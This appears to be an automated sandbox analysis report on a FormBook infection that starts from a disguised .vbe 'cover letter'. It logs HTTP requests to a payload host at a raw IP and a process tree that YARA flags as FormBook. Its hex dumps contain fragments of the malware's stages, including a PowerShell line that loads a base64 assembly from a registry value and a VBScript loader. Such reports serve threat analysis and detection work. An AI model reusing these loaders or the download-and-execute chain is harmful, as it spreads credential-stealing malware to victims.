          Aug 29, 2024 18:36:58.563821077 CEST1236INData Raw: 39 34 32 35 38 35 39 37 36 34 45 36 43 34 43 37 41 37 38 33 32 36 32 36 41 33 39 34 37 36 34 37 36 34 41 34 38 35 35 37 35 34 44 35 38 35 41 36 41 36 43 36 44 36 34 37 39 35 36 33 32 35 35 37 35 34 39 35 37 35 41 35 38 33 35 35 33 36 32 36 43 35
          Data Ascii: 9425859764E6C4C7A7832626A394764764A4855754D585A6A6C6D64795632557549575A583553626C523363354E464E414551594141414141416741414541434141414D75416A4C3334794E786767637652585979566D626C64555A736C6D526C78325A756C32557A646D62705248646C4E6C4C79566D626E6C
          Aug 29, 2024 18:36:58.566282034 CEST1236INData Raw: 31 34 37 35 33 34 31 34 31 34 31 34 35 33 30 36 45 34 35 34 32 34 35 34 31 34 31 34 36 33 30 36 45 34 35 34 31 34 31 34 31 34 32 33 35 34 41 34 32 34 31 34 31 35 31 34 31 34 41 35 33 34 31 34 31 34 31 34 35 33 30 36 43 34 35 34 31 34 31 34 31 34
          Data Ascii: 1475341414145306E454245414146306E4541414142354A42414151414A5341414145306C45414141424949424141514144534141414549774143454A675355684249776945474D414753597741394A6842446B6E45474D414A5345414B5355684248306C454267694556597742494952416F49524647634144
          Aug 29, 2024 18:36:58.566293001 CEST1236INData Raw: 35 34 41 37 38 34 31 34 38 36 33 34 31 34 41 35 33 34 35 37 37 34 32 34 35 33 30 36 43 34 35 34 32 36 33 34 31 34 32 34 39 34 39 35 32 34 31 34 38 35 31 34 31 34 31 35 34 34 31 34 31 34 39 34 35 37 37 36 37 34 35 34 32 36 33 34 31 34 32 36 42 34
          Data Ascii: 54A78414863414A5345774245306C454263414249495241485141415441414945776745426341426B4952416F49524647306C4542676945565941435345414B535568424D4952416F495246473467444F3451414541794239455241424153424F34514143415342434551416751674442454149454552454245
          Aug 29, 2024 18:36:58.570626974 CEST1236INData Raw: 37 34 31 37 33 34 32 35 31 35 39 34 31 33 30 34 37 34 31 37 30 34 32 37 37 35 39 34 31 35 35 34 37 34 31 36 42 34 32 35 31 35 39 34 31 34 44 34 38 34 31 36 43 34 32 34 31 34 39 34 31 34 35 34 37 34 31 36 45 34 32 36 37 36 32 34 31 36 42 34 37 34
          Data Ascii: 741734251594130474170427759415547416B425159414D48416C424149414547416E426762416B474179424164414D484167415159417747417342515A4151474167415159416F48413642515A416747416E4267624155484173424149414547414D464841414D48416C4277594149484131427762414D4841
          Aug 29, 2024 18:36:58.576998949 CEST1236INData Raw: 32 34 41 35 38 35 41 35 34 34 41 35 38 35 41 37 33 36 43 34 37 36 33 37 34 33 39 33 32 35 31 37 35 34 44 35 37 36 31 37 41 34 36 36 44 35 31 37 33 34 36 35 37 36 34 37 41 36 43 36 44 35 36 37 35 35 31 36 45 35 41 37 36 34 45 33 33 36 32 37 39 34
          Data Ascii: 24A585A544A585A736C476374393251754D57617A466D51734657647A6C6D5675516E5A764E3362794E57614E4277636C4E5761324A585A5442336279564764756C6B4C6C31576130355764533553626C523363354E46417A563259705A6E636C4E6C62766C4764684E57617342486342357959704E58594378
          Aug 29, 2024 18:36:58.763782024 CEST176OUTGET /2508/r HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          Accept-Language: en-CH
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: 144.91.79.54
          Aug 29, 2024 18:36:59.289067030 CEST1236INHTTP/1.1 200 OK
          Date: Thu, 29 Aug 2024 16:36:58 GMT
          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
          Last-Modified: Sun, 25 Aug 2024 00:50:37 GMT
          ETag: "8c00-62077658a4a62"
          Accept-Ranges: bytes
          Content-Length: 35840
          Keep-Alive: timeout=5, max=99
          Connection: Keep-Alive
          Data Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 [TRUNCATED]
          Data Ascii: 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
          Aug 29, 2024 18:36:59.382869005 CEST199OUTGET /2508/u9icZZB5Fm5owWojnw5Q.txt HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          Accept-Language: en-CH
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: 144.91.79.54
          Aug 29, 2024 18:36:59.603091002 CEST1236INHTTP/1.1 200 OK
          Date: Thu, 29 Aug 2024 16:36:59 GMT
          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
          Last-Modified: Sun, 25 Aug 2024 22:14:56 GMT
          ETag: "8cc00-6208956a856d0"
          Accept-Ranges: bytes
          Content-Length: 576512
          Keep-Alive: timeout=5, max=98
          Connection: Keep-Alive
          Content-Type: text/plain
          Data Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 [TRUNCATED]
          Data Ascii: 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
          Aug 29, 2024 18:37:00.322772980 CEST176OUTGET /2508/v HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          Accept-Language: en-CH
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: 144.91.79.54
          Aug 29, 2024 18:37:00.520952940 CEST761INHTTP/1.1 200 OK
          Date: Thu, 29 Aug 2024 16:37:00 GMT
          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
          Last-Modified: Fri, 16 Aug 2024 03:14:55 GMT
          ETag: "1de-61fc45d0b8951"
          Accept-Ranges: bytes
          Content-Length: 478
          Keep-Alive: timeout=5, max=97
          Connection: Keep-Alive
          Data Raw: 37 42 35 42 37 44 34 31 37 30 37 30 34 34 36 46 36 44 36 31 36 39 36 45 37 42 35 44 37 44 33 41 33 41 34 33 37 35 37 32 37 32 36 35 36 45 37 34 34 34 36 46 36 44 36 31 36 39 36 45 32 45 34 43 36 46 36 31 36 34 37 42 32 38 37 44 35 42 34 33 36 46 36 45 37 36 36 35 37 32 37 34 37 42 35 44 37 44 33 41 33 41 34 36 37 32 36 46 36 44 34 32 36 31 37 33 36 35 33 36 33 34 35 33 37 34 37 32 36 39 36 45 36 37 37 42 32 38 37 44 37 42 32 38 37 44 32 44 36 41 36 46 36 39 36 45 32 30 37 42 32 38 37 44 34 37 36 35 37 34 32 44 34 39 37 34 36 35 36 44 35 30 37 32 36 46 37 30 36 35 37 32 37 34 37 39 32 30 32 44 34 43 36 39 37 34 36 35 37 32 36 31 36 43 35 30 36 31 37 34 36 38 32 30 32 37 34 38 34 42 34 33 35 35 33 41 35 43 35 33 36 46 36 36 37 34 37 37 36 31 37 32 36 35 35 43 37 43 37 30 36 31 37 34 36 38 37 43 32 37 32 30 32 44 34 45 36 31 36 44 36 35 32 30 32 37 37 33 32 37 37 42 32 39 37 44 32 45 37 33 32 30 37 43 32 30 34 36 36 46 37 32 34 35 36 31 36 33 36 38 32 44 34 46 36 32 36 41 36 35 36 33 37 34 32 30 37 42 [TRUNCATED]
          Data Ascii: 7B5B7D417070446F6D61696E7B5D7D3A3A43757272656E74446F6D61696E2E4C6F61647B287D5B436F6E766572747B5D7D3A3A46726F6D426173653634537472696E677B287D7B287D2D6A6F696E207B287D4765742D4974656D50726F7065727479202D4C69746572616C506174682027484B43553A5C536F6674776172655C7C706174687C27202D4E616D65202773277B297D2E73207C20466F72456163682D4F626A656374207B7B7D245F7B5B7D2D312E2E2D7B287D245F2E4C656E6774687B297D7B5D7D7B7D7D7B297D7B297D7B297D3B207B5B7D612E617B5D7D3A3A617B287D277C706174687C277B297D
          Aug 29, 2024 18:37:00.548715115 CEST179OUTGET /2508/file HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          Accept-Language: en-CH
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: 144.91.79.54
          Aug 29, 2024 18:37:00.744687080 CEST1236INHTTP/1.1 200 OK
          Date: Thu, 29 Aug 2024 16:37:00 GMT
          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
          Last-Modified: Wed, 21 Aug 2024 05:14:58 GMT
          ETag: "1030-6202a9f95545c"
          Accept-Ranges: bytes
          Content-Length: 4144
          Keep-Alive: timeout=5, max=96
          Connection: Keep-Alive
          Data Raw: 34 46 37 30 37 34 36 39 36 46 36 45 32 30 34 35 37 38 37 30 36 43 36 39 36 33 36 39 37 34 30 41 32 37 34 45 36 46 36 44 32 30 36 34 37 35 32 30 37 30 37 32 36 46 36 41 36 35 37 34 33 41 32 30 37 43 37 30 36 31 37 34 36 38 37 43 30 41 32 37 32 30 34 39 36 45 36 39 37 34 36 39 36 31 36 43 36 39 37 33 36 31 37 34 36 39 36 46 36 45 32 30 36 34 36 35 37 33 32 30 36 46 36 32 36 41 36 35 37 34 37 33 32 30 36 35 37 34 32 30 37 36 36 31 37 32 36 39 36 31 36 32 36 43 36 35 37 33 30 41 34 34 36 39 36 44 32 30 36 37 36 35 37 33 37 34 36 39 36 46 36 45 36 45 36 31 36 39 37 32 36 35 35 33 36 38 36 35 36 43 36 43 32 43 32 30 37 32 36 35 37 30 36 35 37 32 37 34 36 46 36 39 37 32 36 35 35 33 37 39 37 33 37 34 36 35 36 44 36 35 32 43 32 30 36 39 37 34 36 35 37 32 36 31 37 34 36 39 36 46 36 45 30 41 35 33 36 35 37 34 32 30 36 37 36 35 37 33 37 34 36 39 36 46 36 45 36 45 36 31 36 39 37 32 36 35 35 33 36 38 36 35 36 43 36 43 32 30 33 44 32 30 34 33 37 32 36 35 36 31 37 34 36 35 34 46 36 32 36 41 36 35 36 33 37 34 32 38 [TRUNCATED]
          Data Ascii: 4F7074696F6E204578706C696369740A274E6F6D2064752070726F6A65743A207C706174687C0A2720496E697469616C69736174696F6E20646573206F626A657473206574207661726961626C65730A44696D2067657374696F6E6E616972655368656C6C2C207265706572746F69726553797374656D652C20697465726174696F6E0A5365742067657374696F6E6E616972655368656C6C203D204372656174654F626A6563742822575363726970742E5368656C6C22290A7265706572746F69726553797374656D65203D2067657374696F6E6E616972655368656C6C2E457870616E64456E7669726F6E6D656E74537472696E677328222577696E6469722522290A0A2720466F6E6374696F6E20706F75722076E9726966696572206C276578E9637574696F6E206427756E2070726F6365737375730A46756E6374696F6E2050726F6365737375734573744163746966286E6F6D447550726F636573737573290A2020202044696D2067657374696F6E6E61697265574D492C206C6973746544657350726F6365737375730A202020205365742067657374696F6E6E61697265574D49203D204765744F626A656374282277696E6D676D74733A5C5C2E5C726F6F745C63696D763222290A20202020536574206C6973746


          Statistics

          CPU Usage

          Click to jump to process

          Memory Usage

          Click to jump to process

          High Level Behavior Distribution

          Click to dive into process behavior distribution

          Behavior

          Click to jump to process

          System Behavior

          General

          Target ID:0
          Start time:12:36:56
          Start date:29/08/2024
          Path:C:\Windows\System32\wscript.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\01_COVER_LETTER_-_FOR_E_PAYMENT.vbe"
          Imagebase:0x7ff6a1960000
          File size:170'496 bytes
          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:2
          Start time:12:37:01
          Start date:29/08/2024
          Path:C:\Windows\System32\wscript.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\mBUojysElnsNYdM.vbs"
          Imagebase:0x7ff6a1960000
          File size:170'496 bytes
          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          General

          Target ID:3
          Start time:12:37:02
          Start date:29/08/2024
          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
          Imagebase:0x7ff6e3d50000
          File size:452'608 bytes
          MD5 hash:04029E121A0CFA5991749937DD22A1D9
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:4
          Start time:12:37:02
          Start date:29/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff66e660000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:5
          Start time:12:37:07
          Start date:29/08/2024
          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Imagebase:0xce0000
          File size:43'008 bytes
          MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2428546911.0000000000DB0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2428546911.0000000000DB0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2428974827.0000000001710000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2428974827.0000000001710000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
          Reputation:moderate
          Has exited:true

          General

          Target ID:7
          Start time:12:37:08
          Start date:29/08/2024
          Path:C:\Windows\System32\wermgr.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "5960" "2556" "2808" "2640" "0" "0" "2560" "0" "0" "0" "0" "0"
          Imagebase:0x7ff794bc0000
          File size:229'728 bytes
          MD5 hash:74A0194782E039ACE1F7349544DC1CF4
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:moderate
          Has exited:true

          General

          Target ID:11
          Start time:12:37:27
          Start date:29/08/2024
          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
          Imagebase:0x7ff6e3d50000
          File size:452'608 bytes
          MD5 hash:04029E121A0CFA5991749937DD22A1D9
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:12
          Start time:12:37:27
          Start date:29/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff66e660000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:14
          Start time:12:37:31
          Start date:29/08/2024
          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Imagebase:0x270000
          File size:43'008 bytes
          MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:moderate
          Has exited:true

          General

          Target ID:15
          Start time:12:37:31
          Start date:29/08/2024
          Path:C:\Windows\System32\wermgr.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "5264" "2560" "2180" "2464" "0" "0" "2640" "0" "0" "0" "0" "0"
          Imagebase:0x7ff794bc0000
          File size:229'728 bytes
          MD5 hash:74A0194782E039ACE1F7349544DC1CF4
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:moderate
          Has exited:true

          General

          Target ID:17
          Start time:12:37:53
          Start date:29/08/2024
          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
          Imagebase:0x7ff6e3d50000
          File size:452'608 bytes
          MD5 hash:04029E121A0CFA5991749937DD22A1D9
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:18
          Start time:12:37:53
          Start date:29/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff66e660000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:19
          Start time:12:37:57
          Start date:29/08/2024
          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Imagebase:0xd30000
          File size:43'008 bytes
          MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:20
          Start time:12:37:57
          Start date:29/08/2024
          Path:C:\Windows\System32\wermgr.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "2056" "2800" "2732" "2804" "0" "0" "2808" "0" "0" "0" "0" "0"
          Imagebase:0x7ff794bc0000
          File size:229'728 bytes
          MD5 hash:74A0194782E039ACE1F7349544DC1CF4
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:21
          Start time:12:38:20
          Start date:29/08/2024
          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
          Imagebase:0x7ff6e3d50000
          File size:452'608 bytes
          MD5 hash:04029E121A0CFA5991749937DD22A1D9
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:22
          Start time:12:38:20
          Start date:29/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff66e660000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:23
          Start time:12:38:23
          Start date:29/08/2024
          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Imagebase:0xf60000
          File size:43'008 bytes
          MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:24
          Start time:12:38:23
          Start date:29/08/2024
          Path:C:\Windows\System32\wermgr.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "3780" "2612" "2844" "2596" "0" "0" "2508" "0" "0" "0" "0" "0"
          Imagebase:0x7ff794bc0000
          File size:229'728 bytes
          MD5 hash:74A0194782E039ACE1F7349544DC1CF4
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:25
          Start time:12:38:46
          Start date:29/08/2024
          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
          Imagebase:0x7ff6e3d50000
          File size:452'608 bytes
          MD5 hash:04029E121A0CFA5991749937DD22A1D9
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:26
          Start time:12:38:46
          Start date:29/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff66e660000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:27
          Start time:12:38:50
          Start date:29/08/2024
          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Imagebase:0xd20000
          File size:43'008 bytes
          MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:28
          Start time:12:38:50
          Start date:29/08/2024
          Path:C:\Windows\System32\wermgr.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "5256" "2508" "2512" "2556" "0" "0" "2560" "0" "0" "0" "0" "0"
          Imagebase:0x7ff794bc0000
          File size:229'728 bytes
          MD5 hash:74A0194782E039ACE1F7349544DC1CF4
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:29
          Start time:12:39:12
          Start date:29/08/2024
          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
          Imagebase:0x7ff6e3d50000
          File size:452'608 bytes
          MD5 hash:04029E121A0CFA5991749937DD22A1D9
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:30
          Start time:12:39:12
          Start date:29/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff66e660000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:31
          Start time:12:39:15
          Start date:29/08/2024
          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Imagebase:0xf40000
          File size:43'008 bytes
          MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:32
          Start time:12:39:16
          Start date:29/08/2024
          Path:C:\Windows\System32\wermgr.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "5368" "2468" "2228" "2508" "0" "0" "2496" "0" "0" "0" "0" "0"
          Imagebase:0x7ff794bc0000
          File size:229'728 bytes
          MD5 hash:74A0194782E039ACE1F7349544DC1CF4
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:33
          Start time:12:39:38
          Start date:29/08/2024
          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
          Imagebase:0x7ff6e3d50000
          File size:452'608 bytes
          MD5 hash:04029E121A0CFA5991749937DD22A1D9
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:34
          Start time:12:39:38
          Start date:29/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff66e660000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:35
          Start time:12:39:41
          Start date:29/08/2024
          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Imagebase:0xef0000
          File size:43'008 bytes
          MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:36
          Start time:12:39:42
          Start date:29/08/2024
          Path:C:\Windows\System32\wermgr.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "6068" "2816" "2752" "2820" "0" "0" "2824" "0" "0" "0" "0" "0"
          Imagebase:0x7ff794bc0000
          File size:229'728 bytes
          MD5 hash:74A0194782E039ACE1F7349544DC1CF4
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:37
          Start time:12:40:04
          Start date:29/08/2024
          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
          Imagebase:0x7ff6e3d50000
          File size:452'608 bytes
          MD5 hash:04029E121A0CFA5991749937DD22A1D9
          Has elevated privileges:false
          Has administrator privileges:false
